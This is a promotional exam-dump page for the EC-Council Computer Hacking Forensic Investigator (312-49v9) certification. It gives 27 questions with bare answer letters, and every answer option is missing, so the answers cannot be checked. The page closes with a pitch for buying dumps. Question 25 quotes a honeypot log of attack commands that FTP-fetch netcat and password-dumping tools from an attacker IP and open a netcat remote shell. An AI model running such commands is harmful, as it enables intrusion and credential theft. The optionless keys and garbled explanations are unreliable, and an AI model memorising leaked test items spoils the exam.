Want to know Certleader 312-49v9 Exam practice test features? Want to lear more about EC-Council ECCouncil Computer Hacking Forensic Investigator (V9) certification experience? Study Tested EC-Council 312-49v9 answers to Far out 312-49v9 questions at Certleader. Gat a success with an absolute guarantee to pass EC-Council 312-49v9 (ECCouncil Computer Hacking Forensic Investigator (V9)) test on your first attempt.
NEW QUESTION 1
Jonathan is a network administrator who is currently testing the internal security of his network. He is attempting to hijack a session, using Ettercap, of a user connected to his Web server. Why will Jonathan not succeed?
Answer: C
NEW QUESTION 2
Which response organization tracks hoaxes as well as viruses?
Answer: D
Explanation:
Note: CIAC (Computer Incident Advisory Capability) Was run by the US Department of energy
NEW QUESTION 3
In handling computer-related incidents, which IT role should be responsible for recovery, containment, and prevention to constituents?
Answer: B
NEW QUESTION 4
When is it appropriate to use computer forensics?
Answer: A
NEW QUESTION 5
Which of the following commands shows you the NetBIOS name table each?
Answer: A
NEW QUESTION 6
In a virtual test environment, Michael is testing the strength and security of BGP using multiple routers to mimic the backbone of the Internet. This project will help him write his doctoral thesis on "bringing down the Internet". Without sniffing the traffic between the routers, Michael sends millions of RESET packets to the routers in an attempt to shut one or all of them down. After a few hours, one of the routers finally shuts itself down. What will the other routers communicate between themselves?
Answer: A
NEW QUESTION 7
Windows Security Event Log contains records of login/logout activity or other security-related events specified by the system's audit policy. What does event ID 531 in Windows Security Event Log indicates?
Answer: D
NEW QUESTION 8
Frank is working on a vulnerability assessment for a company on the West coast. The company hired Frank to assess its network security through scanning, pen tests, and vulnerability assessments. After discovering numerous known vulnerabilities detected by a temporary IDS he set up, he notices a number of items that show up as unknown but Questionable in the logs. He looks up the behavior on the Internet, but cannot find anything related. What organization should Frank submit the log to find out if it is a new vulnerability or not?
Answer: A
NEW QUESTION 9
To make sure the evidence you recover and analyze with computer forensics software can be admitted in court, you must test and validate the software. What group is actively providing tools and creating procedures for testing and validating computer forensics software ?
Answer: C
NEW QUESTION 10
Why should you never power on a computer that you need to acquire digital evidence from?
Answer: A
NEW QUESTION 11
When performing a forensics analysis, what device is used to prevent the system from recording data on an evidence disk?
Answer: A
NEW QUESTION 12
Microsoft Security IDs are available in Windows Registry Editor. The path to locate IDs in Windows 7 is:
Answer: A
NEW QUESTION 13
Corporate investigations are typically easier than public investigations because:
Answer: B
NEW QUESTION 14
From the following spam mail header, identify the host IP that sent this spam? From jie02@netvigator.com jie02@netvigator.com Tue Nov 27 17:27:11 2001
Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id
fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)
Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)
Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk From: "china hotel web"
To: "Shlam"
Subject: SHANGHAI (HILTON HOTEL) PACKAGE Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0
X-Priority: 3 X-MSMail- Priority: Normal
Reply-To: "china hotel web"
Answer: C
NEW QUESTION 15
What is the first step that needs to be carried out to investigate wireless attacks?
Answer: A
NEW QUESTION 16
You have been asked to investigate the possibility of computer fraud in the finance department of a company. It is suspected that a staff member has been committing finance fraud by printing cheques that have not been authorized. You have exhaustively searched all data files on a bitmap image of the target computer, but have found no evidence. You suspect the files may not have been saved. What should you examine next in this case?
Answer: B
NEW QUESTION 17
Which one of the following is not a consideration in a forensic readiness planning checklist?
Answer: D
NEW QUESTION 18
This is the original file structure database that Microsoft originally designed for floppy disks. It is written to the outermost track of a disk and contains information about each file stored on the drive.
Answer: C
Explanation:
A MBR is usually found on fixed disks, not floppy. A MFT is part of NTFS, and NTFS is not used on floppy DOS is an operating system, not a file structure database
NEW QUESTION 19
File deletion is a way of removing a file from a computer's file system. What happens when a file is deleted in windows7?
Answer: B
NEW QUESTION 20
What term is used to describe a cryptographic technique for embedding information into something else for the sole
purpose of hiding that information from the casual observer?
Answer: B
NEW QUESTION 21
What is the smallest allocation unit of a hard disk?
Answer: A
NEW QUESTION 22
Jones had been trying to penetrate a remote production system for the past two weeks. This time however, he is able to get into the system. He was able to use the system for a period of three weeks. However law enforcement agencies were recording his every activity and this was later presented as evidence. The organization had used a virtual environment to trap Jones. What is a virtual environment?
Answer: B
NEW QUESTION 23
What file structure database would you expect to find on floppy disks?
Answer: D
Explanation:
NTFS is not designed for removable media, although used on some removable media that is very large, never for floppy disks.
FAT32 has a minimum space requirement which is larger than floppy disks FAT16 would seem like a logical choice, but is not usually used on floppies FAT12 would be on floppy disks, and probably not seen on anything else. Since floppy disk media is small in size (less than 2 MB), a FAT12 file system has lower overhead and is more efficient.
NEW QUESTION 24
Which of the following statement is not correct when dealing with a powered-on computer at the crime scene?
Answer: D
NEW QUESTION 25
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom" "cmd1.exe /c echo johna2k >>ftpcom" "cmd1.exe /c echo haxedj00
>>ftpcom" "cmd1.exe /c echo get nc.exe >>ftpcom" "cmd1.exe /c echo get pdump.exe >>ftpcom" "cmd1.exe /c echo get samdump.dll >>ftpcom" "cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given?
Answer: C
Explanation:
The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.
NEW QUESTION 26
Which of the following statements does not support the case assessment?
Answer: C
NEW QUESTION 27
......
P.S. Easily pass 312-49v9 Exam with 209 Q&As Passcertsure Dumps & pdf Version, Welcome to Download the Newest Passcertsure 312-49v9 Dumps: https://www.passcertsure.com/312-49v9-test/ (209 New Questions)